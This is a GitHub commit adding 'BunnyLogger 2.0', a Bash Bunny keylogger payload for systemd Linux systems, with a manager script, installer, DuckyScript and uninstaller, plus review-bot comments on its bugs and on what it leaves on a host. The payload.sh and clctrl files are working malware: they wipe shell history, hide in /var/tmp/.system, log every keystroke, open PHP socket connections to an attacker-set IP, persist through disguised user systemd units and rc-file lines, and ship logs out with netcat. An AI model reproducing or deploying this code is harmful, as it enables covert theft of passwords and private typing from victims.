Uploading BunnyLogger 2.0

pull/545/head
drapl0n 2022-08-22 19:01:58 +05:30 committed by GitHub
parent 600c65bf40
commit 38bbd9ac7e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
9 changed files with 366 additions and 0 deletions


@ -0,0 +1,39 @@
## About:
* Title: BunnyLogger 2.0
* Description: Key logger which sends each and every key stroke of target remotely/locally.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Credentials
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID, Storage
## BunnyLogger 2.0: BunnyLogger is a Key Logger which captures every key stroke of target and send them to attacker.
### Features:
* Live keystroke capturing.
* Stored Keystroke capturing.
* Bunny Logger Manager: Interactive TUI Dashboard.
* Detailed key logs.
* Persistent.
* Autostart payload on boot.
### Directory Structure of payload components:
| FileName | Directory |
| -------------- | ------------------------------ |
| payload.txt | /payload/switch1/ |
| payload.sh | /payload/ |
| requirements/* | /payloads/library/bunnyLogger2 |
### LED Status:
* `LED SETUP` : MAGENTA
* `LED ATTACK` : YELLOW
* `LED FINISH` : GREEN
### Usage:
* Install BunnyLogger 2.0: `chmod +x install.sh && sudo ./install.sh`
* Run : `bunnyLoggerMgr` to launch BunnyLogger Manager.
#### Support me if you like my work:
* https://twitter.com/drapl0n


@ -0,0 +1,191 @@
#!/bin/bash
allowAbort=true;
myInterruptHandler()
{
if $allowAbort; then
echo
echo -e "\n\033[1;34m[INFO]: \e[0mYou terminated bunnyLoggerMgr..." && exit 1;
fi;
}
trap myInterruptHandler SIGINT
echo -e "\033[4m\033[1mWelcome to BunnyLogger Manager!!!\033[0m"
echo
echo -e "1] Fetch Keylogs.\n2] Create new target.\n3] List available target.\n4] Remove target.\n5] Update target.\n6] Decode Key Logs."
echo
read -p "Enter your choice: " ch
create(){
read -p "Enter Target's name(without whitespaces): " name
if [[ $(grep -oh "\w*$name\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $name ]]; then
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mName \"$name\" already exists."
exit 1
fi
read -p "Enter Servers IP: " ip
read -p "Enter Unique Port Number(1500-65535): " port
read -p "Enter another Unique Port Number(1500-65535): " secPort
if [ "$port" == "$secPort" ]; then
echo -e "\033[1;34m[INFO]: \033[0mTwo ports can't be similar."
exit 1
fi
if [[ $(grep -oh "\w*$ip\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $ip ]] && [[ $(grep -oh "\w*$port\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $port ]] && [[ $(grep -oh "\w*$secPort\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $secPort ]]; then
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mTarget exist with similar IP address \"$ip\" and port number one \"$port\", port number two \"$secPort\"."
exit 1
fi
max=65535
min=1500
if [[ $ip =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && (( $port <= $max )) && (( $port >= $min )) && (( $secPort <= $max )) && (( $secPort >= $min )); then
read -p "Specify directory for output: " dir
if [ ! -d "$dir" ]; then
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
exit 1
else
cp -r ~/.config/bunnyLogger/payload.sh $dir
fi
sed -i -e "s/0.0.0.0/$ip/g" $dir/payload.sh
sed -i -e "s/4444/$port/g" $dir/payload.sh
sed -i -e "s/5555/$secPort/g" $dir/payload.sh
echo -e "$(echo "$name"|xargs)\t$ip\t$port\t$secPort" >> ~/.config/bunnyLogger/bunnyLogger.db
else
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid IP address \"$ip\" or Port Number \"$port\" or Port Number \"$secPort\"."
exit 1
fi
}
list(){
column -t -o ' ' ~/.config/bunnyLogger/bunnyLogger.db | awk '{print NR" - "$0}'
}
remove(){
echo
list
echo
read -p "Enter name of target to remove: " rmv
if grep -q $rmv ~/.config/bunnyLogger/bunnyLogger.db; then
sed -i "/\b\($rmv\)\b/d" ~/.config/bunnyLogger/bunnyLogger.db
echo -e "\033[1;34m\e[1m[INFO]: \e[0m Successfully Removed \"$rmv\"."
else
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$rmv\" no such target found."
fi
}
update(){
echo
list
echo
read -p "Choose target number: " cho
read -p "You want to update (ip|portOne|portTwo): " ent
if [ "$ent" = ip ]
then
one=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
read -p "Enter new ip: " use
if [[ $use =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
sed -i -e "$cho s/$one/$use/g" ~/.config/bunnyLogger/bunnyLogger.db
echo -e "\033[1;34m\e[1m[INFO]: \e[0mSuccessfully Updated IP."
else
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid IP address \"$use\"."
exit
fi
elif [ "$ent" = portOne ]
then
two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 3}')
read -p "Enter new Port number: " useP
max=65535
min=1500
if (( $useP <= $max )) && (( $useP >= $min )); then
sed -i -e "$cho s/$two/$useP/g" ~/.config/bunnyLogger/bunnyLogger.db
echo -e "\033[1;34m\e[1m[INFO]: \e[0mUpdated Port number\"$ent\"."
else
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Port Number \"$useP\"."
fi
elif [ "$ent" = portTwo ]
then
two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 4}')
read -p "Enter new Port number: " useP
max=65535
min=1500
if (( $useP <= $max )) && (( $useP >= $min )); then
sed -i -e "$cho s/$two/$useP/g" ~/.config/bunnyLogger/bunnyLogger.db
echo -e "\033[1;34m\e[1m[INFO]: \e[0mUpdated Port number\"$ent\"."
else
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Port Number \"$useP\"."
fi
else
echo -e "\033[1;31m\e[1m[ERROR]: \e0m[Invalid choice \"$ent\"."
fi
}
fetch(){
echo
list
echo
read -p "Enter Target number to connect: " cho
one=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 3}')
three=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 4}')
echo -en "1] Live Capture \t2]Fetch Stored Logs: "
read typ
case $typ in
1)
read -p "Specify directory for output: " dir
read -p "Enter filename to store logs: " filename
if [ ! -d "$dir" ]; then
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
exit 1
else
echo "\033[1;34m\e[1m[[INFO]: \e[0mStarted Keylogs Capture..."
nc -lvp $two > $dir/$filename.log
fi
;;
2)
read -p "Specify directory for output: " dir
read -p "Enter filename to store logs: " filename
if [ ! -d "$dir" ]; then
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
exit 1
else
nc -lvp 1444 > $dir/$filename.log &
nc -lvp $three
fi
;;
*)
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Choice.."
;;
esac
}
decode(){
echo -e "1] Normal Decode \t2] Informative Decode"
read -p "Enter your choice: " cho
read -p "Enter path of file to decode: " path
read -p "Enter path for decoded log: " out
case $cho in
1)
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $path | grep press | awk '{print $4}' > $out
;;
2)
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $path > $out
;;
*)
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Choice \"$cho\"."
;;
esac
}
case $ch in
1)
fetch
;;
2)
create
;;
3)
list
;;
4)
update
;;
5)
remove
;;
6)
decode
;;
*)
echo -e "\033[1;31m\e[1m[ERROR]: Invalid Choice \"$ch\"."
;;
esac
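Review bot: In `create` the two port values go straight from `read` into `(( $port <= $max ))` with no check that they are numeric, and bash arithmetic evaluates its operand as an expression rather than treating it as a literal, so arbitrary typed text is interpreted instead of rejected. A digits-only test ahead of the range comparison closes that, e.g. `[[ $port =~ ^[0-9]+$ && $secPort =~ ^[0-9]+$ ]] || exit 1`. `update` has the same pattern with `$useP`, and `$cho` and `$rmv` are spliced unvalidated into `sed -i` programs that edit `bunnyLogger.db` in place (`sed -i "/\b\($rmv\)\b/d"`), where a `/` or a regex metacharacter changes the command that runs. Separately, the menu text lists 4 as Remove and 5 as Update while the final `case` calls `update` for 4 and `remove` for 5, so choosing Update deletes a record.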


@ -0,0 +1,7 @@
#!/bin/bash
path=~/.config/bunnyLogger
mkdir $path
cp payload.sh $path
touch $path/bunnyLogger.db
chmod +x bunnyLoggerMgr
sudo cp bunnyLoggerMgr /usr/local/bin/
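Review bot: Only the last line needs elevation and it already calls `sudo` itself, yet the README in this commit tells the user to run the whole installer as `sudo ./install.sh`. Run that way, `mkdir`, `cp` and `touch` execute as root, so `~/.config/bunnyLogger` and `bunnyLogger.db` are presumably created root-owned (or under root's home, depending on how sudo sets HOME), while `bunnyLoggerMgr` later appends to that database as the ordinary user. Suggest the README usage line become `chmod +x install.sh && ./install.sh`, and `mkdir $path` become `mkdir -p -- "$path"` so a second run does not fail on the existing directory.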


@ -0,0 +1,28 @@
#!/bin/bash
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
mkdir -p /var/tmp/.system/logs
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
cp -r $mntt/tools/xinput /var/tmp/.system/
cp -r $mntt/payloads/library/bunnyLogger2/clctrl /var/tmp/.system/
cp -r $mntt/payloads/library/bunnyLogger2/nc /var/tmp/.system/
chmod +x /var/tmp/.system/nc
echo -e "name=\$(date +\"%y-%m-%d-%T\")\n/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test > /var/tmp/.system/logs/\$name.log &\n/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
chmod +x /var/tmp/.system/sys
chmod +x /var/tmp/.system/clctrl
chmod +x /var/tmp/.system/xinput
echo -e "while :\ndo\n\tping -c 5 127.0.0.1\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"127.0.0.1\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone &\nwhile :\ndo\n\tping -c 5 127.0.0.1\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"127.0.0.1\",5555);exec("\"/var/tmp/.system/./clctrl "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
chmod +x /var/tmp/.system/systemBus
mkdir -p ~/.config/systemd/user
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
chmod +x /var/tmp/.system/reboot
echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
systemctl --user daemon-reload
systemctl --user enable --now systemBUS.service
systemctl --user start --now systemBUS.service
systemctl --user enable --now reboot.service
systemctl --user start --now reboot.service
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
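Review bot: Nothing in this file or in the README records what the script leaves behind on the host, and the last script in this commit (the one that removes `~/.config/bunnyLogger` and `/usr/local/bin/bunnyLoggerMgr`) only cleans up the manager side. As written, this script creates `/var/tmp/.system/` (with `logs/`, `sys`, `systemBus`, `reboot` and the copied binaries), writes the user units `~/.config/systemd/user/systemBUS.service` and `reboot.service`, and appends `systemctl --user enable --now ...` lines to `~/.bashrc` and `~/.zshrc` when those files are found. A header comment listing those paths and units would give whoever closes out an authorised test a removal checklist, and gives defenders the same list to hunt on: user-level systemd units whose `ExecStart` points under `/var/tmp`, and `systemctl --user` lines in shell rc files.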


@ -0,0 +1,56 @@
# Title: BunnyLogger
# Description: Key logger which sends each and every key stroke of target remotely/locally.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Credentials
# Target: Unix-like operating systems with systemd.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh
Q ENTER
Q DELAY 2000
Q STRING rm /tmp/payload.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH


@ -0,0 +1,41 @@
#!/bin/bash
transfer(){
echo -e "\033[1;34m[INFO]: Target Logs:\033[0m"
cd /var/tmp/.system/logs/
ls /var/tmp/.system/logs/ | sort
echo
echo -n "Enter filename to transfer: "
read ch
if [ -f $ch ];
then
echo -e "\033[1;34m[INFO]: Transferring file...\033[0m"
/var/tmp/.system/./nc -q 0 127.0.0.1 1444 < $ch >/dev/null 2>&1
if [ $? -eq 0 ]; then
echo -e "\033[1;32m[SUCCESS]: File Transferred.\033[0m"
else
echo -e "\033[1;34m[INFO]: Netcat listner is not running on Attacking system.\033[0m\n\033[1;31m[ERROR]: File transfer failed.\033[0m"
fi
else
echo -e "\033[1;31m[ERROR]: Invalid Filename \"$ch\".\033[0m"
fi
}
conti(){
while :
do
echo
echo -n "Would you like to transfer more files? [Y/N]: "
read ch
if [ "$ch" = y ] || [ "$ch" = Y ];
then
transfer
elif [ "$ch" = N ] || [ "$ch" = n ];
then
echo -e "\033[1;34m[INFO]: Terminating...\033[0m"
break
else
echo -e "\033[1;31m[ERROR]: Invalid Choice \"$ch\".\033[0m"
fi
done
}
transfer
conti


@ -0,0 +1,4 @@
#!/bin/bash
path=~/.config/bunnyLogger
rm -rf $path
sudo rm /usr/local/bin/bunnyLoggerMgr